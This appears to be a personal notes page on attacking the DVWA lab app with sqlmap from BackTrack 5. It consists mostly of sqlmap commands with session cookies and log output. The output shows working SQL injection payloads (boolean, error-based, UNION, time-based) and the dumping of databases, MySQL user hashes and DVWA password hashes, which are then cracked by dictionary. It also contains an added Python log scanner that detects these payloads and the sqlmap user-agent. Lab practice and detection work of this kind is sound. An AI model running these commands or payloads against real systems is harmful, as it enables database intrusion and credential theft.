sql injection – sqlmap


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches spanning database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

BackTrack 5 R1

/pentest/database/sqlmap

To find the SQL database version:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To find the SQL database names:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --columns -T table-name -D database-name

To see the data from the database:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --columns -T table-name -D database-name

Grab the cookie from the TamperData Firefox plugin:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using '/pentest/database/sqlmap/output/IP-Address/session' as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8761=8761 AND 'FczA'='FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'COXA'='COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND 'kmcR'='kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'qxrK'='qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, cdcol, mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/IP-Address'
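As an added defender-side example (not part of the original notes), the Python below scans constructed Apache access-log lines for the payload families sqlmap listed above (boolean tautologies, SLEEP() timing, UNION SELECT, the FLOOR(RAND(0)*2) error-based trick and the CHAR(58,...) delimiter markers) and for the sqlmap User-Agent; the log lines, IP address and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (not from the page): one benign request
# followed by requests carrying the payload families sqlmap reported against DVWA.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Mar/2012:10:14:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4562 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2012:10:14:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%208761%3D8761%20AND%20%27FczA%27%3D%27FczA&Submit=Submit HTTP/1.1" 200 4562 "-" "sqlmap/1.0-dev (r4009)"
10.0.0.5 - - [12/Mar/2012:10:14:06 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27qxrK%27%3D%27qxrK&Submit=Submit HTTP/1.1" 200 4562 "-" "sqlmap/1.0-dev (r4009)"
10.0.0.5 - - [12/Mar/2012:10:14:07 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C106%2C118%2C105%2C58%29%2CNULL%29%23&Submit=Submit HTTP/1.1" 200 4562 "-" "sqlmap/1.0-dev (r4009)"
10.0.0.5 - - [12/Mar/2012:10:14:08 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),FLOOR(RAND(0)*2)x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27ycDo%27%3D%27ycDo&Submit=Submit HTTP/1.1" 200 4562 "-" "sqlmap/1.0-dev (r4009)"
"""

# Apache combined log: ip ident user [time] "METHOD target proto" status size "referer" "user-agent"
CLF_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)

# Each pattern is matched against a URL-decoded parameter value.
PATTERNS = [
    ("tautology",    re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),       # AND 8761=8761
    ("tautology",    re.compile(r"'(\w+)'\s*=\s*'\1\b", re.I)),            # 'FczA'='FczA
    ("time_based",   re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),     # SLEEP(5)
    ("union_select", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("error_based",  re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("char_marker",  re.compile(r"\bCHAR\s*\(\s*58\s*,", re.I)),           # sqlmap's ':' delimiter
]


def analyse_request(line):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, ua = m.groups()
    tags = set()
    # parse_qsl percent-decodes each value, so encoded quotes, spaces and parens are restored
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for tag, pattern in PATTERNS:
            if pattern.search(value):
                tags.add(tag)
    if "sqlmap" in ua.lower():
        tags.add("sqlmap_user_agent")
    return {"ip": ip, "time": ts, "method": method, "path": urlsplit(target).path,
            "status": status, "tags": sorted(tags)}


def scan_log(text):
    """Return findings for every line that carries at least one indicator."""
    hits = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        rec = analyse_request(line)
        if rec and rec["tags"]:
            rec["line"] = lineno
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} {hit['path']} -> {', '.join(hit['tags'])}")
```

The User-Agent check only catches a default sqlmap run; the payload patterns are what still fire once the agent string is changed.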

./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --users --passwords

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

--------------------------------------------------------------
updates
--------------------------------------------------------------
Find databases

Used the TamperData Firefox plugin to get the cookie, as below:

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

Reload the login page to get a clean URL: /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

--------------------------------------------------------------
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

--------------------------------------------------------------

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note: you can also use online hash lookup sites.

